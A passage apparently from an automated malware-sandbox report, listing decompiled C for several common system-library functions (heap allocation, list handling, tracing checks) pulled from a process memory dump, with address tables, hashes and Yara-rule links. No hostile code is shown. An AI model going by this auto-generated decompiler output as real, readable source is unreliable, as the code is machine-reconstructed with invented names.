				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0539D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0537E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L05364620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0538F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0537A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                      0x053890af
                                      0x053890b8
                                      0x053890bb
                                      0x053890bf
                                      0x053890c2
                                      0x053890c2
                                      0x053890c8
                                      0x053890cb
                                      0x053890cd
                                      0x053c14d7
                                      0x053c14eb
                                      0x053c14eb
                                      0x00000000
                                      0x053c14eb
                                      0x053c14db
                                      0x053c14e6
                                      0x00000000
                                      0x053c14f2
                                      0x053c14e8
                                      0x00000000
                                      0x053c14e8
                                      0x053890d8
                                      0x053890da
                                      0x053890dd
                                      0x053890e5
                                      0x00000000
                                      0x05389139
                                      0x053890fa
                                      0x053890fe
                                      0x05389142
                                      0x00000000
                                      0x05389142
                                      0x05389104
                                      0x05389107
                                      0x0538910b
                                      0x05389110
                                      0x05389118
                                      0x05389147
                                      0x05389148
                                      0x0538914f
                                      0x05389150
                                      0x05389151
                                      0x05389152
                                      0x05389156
                                      0x0538915d
                                      0x05389160
                                      0x05389168
                                      0x0538916c
                                      0x053891bc
                                      0x053891be
                                      0x00000000
                                      0x053891be
                                      0x0538916e
                                      0x05389173
                                      0x05389176
                                      0x00000000
                                      0x00000000
                                      0x0538917c
                                      0x05389180
                                      0x053891b5
                                      0x00000000
                                      0x053891b5
                                      0x05389182
                                      0x05389185
                                      0x05389189
                                      0x00000000
                                      0x00000000
                                      0x0538918e
                                      0x05389190
                                      0x05389198
                                      0x00000000
                                      0x00000000
                                      0x053891a0
                                      0x00000000
                                      0x053891ad
                                      0x053891ad
                                      0x053891b0
                                      0x053891b1
                                      0x00000000
                                      0x05389185
                                      0x0538911a
                                      0x0538911c
                                      0x0538911f
                                      0x05389125
                                      0x05389127
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction ID: a87d5cbb8f9bbf3ad3074a339090e8bed9673719eb46d4a381375c1f134da61f
                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                      • Instruction Fuzzy Hash: 09218372A04304EFDB20EF59C844E7AFBF9EB44710F1488AAE94597600D374ED10DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05373B7A, Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 59%
                                      			E05373B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x54384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x54384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x54384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0538AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0538FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x54384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x54384c4; // 0x0
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                      0x05373b89
                                      0x05373b96
                                      0x05373ba1
                                      0x05373bab
                                      0x05373bb5
                                      0x05373bb9
                                      0x053b6298
                                      0x05373bbf
                                      0x05373bc2
                                      0x05373bc3
                                      0x05373bc9
                                      0x05373bca
                                      0x05373bcc
                                      0x05373bcd
                                      0x05373bd4
                                      0x05373bd6
                                      0x05373bdb
                                      0x05373bea
                                      0x05373bf7
                                      0x05373bfb
                                      0x05373bff
                                      0x05373c09
                                      0x05373c0a
                                      0x05373c0b
                                      0x05373c0f
                                      0x05373c14
                                      0x05373c18
                                      0x05373c18
                                      0x05373bfb
                                      0x05373c1b
                                      0x05373c30
                                      0x05373c30
                                      0x05373c3d

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 713aedf6066bae126e9c9cd8b1729ca74d94d9e86521ddf24ce3eac0ddcbe55d
                                      • Instruction ID: b30716b0bccf7df0cd7996c6bd737380447a1535310dfbfcaa1aa20cc4117042
                                      • Opcode Fuzzy Hash: 713aedf6066bae126e9c9cd8b1729ca74d94d9e86521ddf24ce3eac0ddcbe55d
                                      • Instruction Fuzzy Hash: 6F21B0B2A00109AFC714DF58CD81BAABBBDFB44208F250168F505AB651D775ED019B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C6CF0, Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E053C6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E05367D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E05367D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5325c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0537F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0537F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E053C7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L05362400( &_v52);
								}
								_t21 = L05362400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                      0x053c6cfb
                                      0x053c6d00
                                      0x053c6d02
                                      0x053c6d06
                                      0x053c6d0a
                                      0x053c6d0e
                                      0x053c6d19
                                      0x053c6d2b
                                      0x053c6d1b
                                      0x053c6d24
                                      0x053c6d24
                                      0x053c6d33
                                      0x053c6d39
                                      0x053c6d46
                                      0x053c6d4f
                                      0x053c6d61
                                      0x053c6d51
                                      0x053c6d5a
                                      0x053c6d5a
                                      0x053c6d69
                                      0x053c6d6b
                                      0x053c6d6d
                                      0x053c6d6f
                                      0x053c6d6f
                                      0x053c6d74
                                      0x053c6d79
                                      0x053c6d7a
                                      0x053c6d7f
                                      0x053c6d82
                                      0x053c6d88
                                      0x053c6d89
                                      0x053c6d90
                                      0x053c6d94
                                      0x053c6da7
                                      0x053c6db1
                                      0x053c6db1
                                      0x053c6dbb
                                      0x053c6dbb
                                      0x053c6d90
                                      0x053c6d69
                                      0x053c6d46
                                      0x053c6dc6

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a52fbf180fa5ef6592ceb184c6c27fda10e4bb3a6f992b5b7a83f7bb32840c4a
                                      • Instruction ID: 621b104d6e881901ec249c6efdaad204aa5af0c9565b08199ba3a35a5ee6dffa
                                      • Opcode Fuzzy Hash: a52fbf180fa5ef6592ceb184c6c27fda10e4bb3a6f992b5b7a83f7bb32840c4a
                                      • Instruction Fuzzy Hash: 4121D3725046549BC311EF28C94CB6BBBECFF81644F04099EB94187250E774D908C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0541070D, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E0541070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E054107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0540AFDE( &_v8,  &_v12);
					E05411293(_t38, _v28, _t60);
					if(E05367D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E054014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                      0x0541071b
                                      0x05410724
                                      0x05410734
                                      0x05410738
                                      0x0541074b
                                      0x0541074b
                                      0x05410753
                                      0x05410753
                                      0x05410759
                                      0x0541075d
                                      0x05410774
                                      0x05410779
                                      0x0541077d
                                      0x05410789
                                      0x05410795
                                      0x054107a7
                                      0x05410797
                                      0x054107a0
                                      0x054107a0
                                      0x054107af
                                      0x054107c4
                                      0x054107cd
                                      0x054107cd
                                      0x054107af
                                      0x054107dc

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction ID: 7cad909bbc2a31df9c7a5bf7473f82805f124ca749513519bc9c1c6b254b3ad3
                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                      • Instruction Fuzzy Hash: 5121F2363082049FD705DF18C888BAABBA6FBC4350F04856EFDA99B385D630D949CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C7794, Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E053C7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5437b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0538F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E05367D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05389AE0();
					_t24 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                      0x053c7799
                                      0x053c779a
                                      0x053c779b
                                      0x053c77a3
                                      0x053c77ab
                                      0x053c77ae
                                      0x053c77b1
                                      0x053c77b1
                                      0x053c77bf
                                      0x053c77c4
                                      0x053c77c8
                                      0x053c77ce
                                      0x053c77d4
                                      0x053c77e0
                                      0x053c77e0
                                      0x053c77d6
                                      0x053c77d6
                                      0x053c77de
                                      0x00000000
                                      0x00000000
                                      0x053c77de
                                      0x053c77e5
                                      0x053c77f0
                                      0x053c77f3
                                      0x053c77f6
                                      0x053c77fd
                                      0x053c7800
                                      0x053c780c
                                      0x053c7818
                                      0x053c782b
                                      0x053c781a
                                      0x053c7823
                                      0x053c7823
                                      0x053c7830
                                      0x053c7831
                                      0x053c7838
                                      0x053c783d
                                      0x053c783e
                                      0x053c784f
                                      0x053c784f
                                      0x053c785a

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 865dbeccc4e3d611faaa20fc04aa87d76d57660e1d8847c85a62ccdd27bacfb0
                                      • Instruction ID: 7c15323edb3c8e87fd87b65ad2690adc512d776307cf0a8b4a0813e29ec1ebbd
                                      • Opcode Fuzzy Hash: 865dbeccc4e3d611faaa20fc04aa87d76d57660e1d8847c85a62ccdd27bacfb0
                                      • Instruction Fuzzy Hash: 8E219D72A00604AFC725DF69D894EABBBA9FF48740F1045ADFA0AC7650D634E900CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536AE73, Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E0536AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E05367D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E05367D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E05367D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E05367D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E053C7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                      0x0536ae78
                                      0x0536ae7c
                                      0x0536ae7e
                                      0x0536ae81
                                      0x0536ae86
                                      0x0536ae8d
                                      0x053b2691
                                      0x0536ae93
                                      0x0536ae93
                                      0x0536ae93
                                      0x0536ae98
                                      0x0536ae9d
                                      0x053b26a2
                                      0x053b26b4
                                      0x053b26a4
                                      0x053b26ad
                                      0x053b26ad
                                      0x053b26b9
                                      0x00000000
                                      0x053b26bb
                                      0x00000000
                                      0x053b26bb
                                      0x0536aea3
                                      0x0536aea3
                                      0x0536aea3
                                      0x0536aeaa
                                      0x053b26c0
                                      0x053b26c9
                                      0x053b26c9
                                      0x0536aeb3
                                      0x053b26d4
                                      0x053b26e1
                                      0x00000000
                                      0x00000000
                                      0x053b26e7
                                      0x053b26ee
                                      0x053b26f0
                                      0x053b26f9
                                      0x053b26f9
                                      0x053b2702
                                      0x053b2708
                                      0x053b2708
                                      0x053b270b
                                      0x053b270f
                                      0x053b2711
                                      0x053b2711
                                      0x053b2725
                                      0x053b2725
                                      0x00000000
                                      0x0536aeb9
                                      0x0536aeb9
                                      0x0536aebf
                                      0x0536aebf
                                      0x0536aeb3

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction ID: c4eff0ced598da92644e6663ccd8ca61812387d6e7d3268632c7197144b4f480
                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                      • Instruction Fuzzy Hash: 6E210435605680CFE711DB28C948B7677EAFF04284F0901A4EE048BA96D7F4DC40C790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537FD9B, Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E0537FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E053576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                      0x0537fd9b
                                      0x0537fda0
                                      0x0537fda1
                                      0x0537fdab
                                      0x0537fdad
                                      0x0537fdb0
                                      0x0537fdb8
                                      0x0537fe0f
                                      0x0537fde6
                                      0x0537fde9
                                      0x0537fdec
                                      0x053bc0c0
                                      0x0537fdfe
                                      0x0537fe06
                                      0x0537fe06
                                      0x053bc0c8
                                      0x0537fe2d
                                      0x0537fe2d
                                      0x00000000
                                      0x0537fe2d
                                      0x053bc0d1
                                      0x053bc0e0
                                      0x053bc0e5
                                      0x053bc0e5
                                      0x053bc0e8
                                      0x00000000
                                      0x053bc0e8
                                      0x0537fdf4
                                      0x00000000
                                      0x00000000
                                      0x0537fdf6
                                      0x0537fdfa
                                      0x0537fe1a
                                      0x0537fe1f
                                      0x0537fe1f
                                      0x0537fdfc
                                      0x00000000
                                      0x0537fdfc
                                      0x0537fdcc
                                      0x0537fdd0
                                      0x0537fe26
                                      0x00000000
                                      0x0537fe26
                                      0x0537fdd8
                                      0x0537fddb
                                      0x0537fddd
                                      0x0537fde0
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction ID: 5710f8b650d6dd4575128005240088f20a4daf5233be1a771b70ba3c217fcd50
                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                      • Instruction Fuzzy Hash: 4B218B72A04A49DFD731CF49C540E66F7EAFB98A10F24857EE94A87A14D778ED00CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537B390, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E0537B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E05362280(_t12, 0x5438608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E053800C2(0x5438608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                      0x0537b395
                                      0x0537b3a2
                                      0x0537b3a5
                                      0x0537b3aa
                                      0x0537b3b2
                                      0x0537b3ba
                                      0x0537b3bd
                                      0x0537b3c0
                                      0x0537b3c4
                                      0x0537b3c9
                                      0x053ba3e9
                                      0x053ba3ed
                                      0x053ba3f0
                                      0x053ba3ff
                                      0x053ba403
                                      0x053ba409
                                      0x00000000
                                      0x00000000
                                      0x053ba40b
                                      0x053ba40b
                                      0x053ba40f
                                      0x053ba415
                                      0x053ba423
                                      0x053ba423
                                      0x053ba415
                                      0x0537b3d1
                                      0x0537b3e8
                                      0x0537b3e8
                                      0x0537b3d9

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 041d1fd778a5c2c736c688149d05923e7ef58e9a6330fbeae4a11ed9614a0e3f
                                      • Instruction ID: befeb44f213a79131d1f385b1ab4d1eee499bb459a60d43543d635311b9a81c9
                                      • Opcode Fuzzy Hash: 041d1fd778a5c2c736c688149d05923e7ef58e9a6330fbeae4a11ed9614a0e3f
                                      • Instruction Fuzzy Hash: 3011AF337051145BCB28CA548D9197BB26BFBC5330B24413DED16C7790DD755C02C2D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05349240, Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E05349240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x541f708);
				E0539D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E053895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E053895D0();
				_t33 =  *0x54384c4; // 0x0
				L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x54384c4; // 0x0
				L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x54384c4; // 0x0
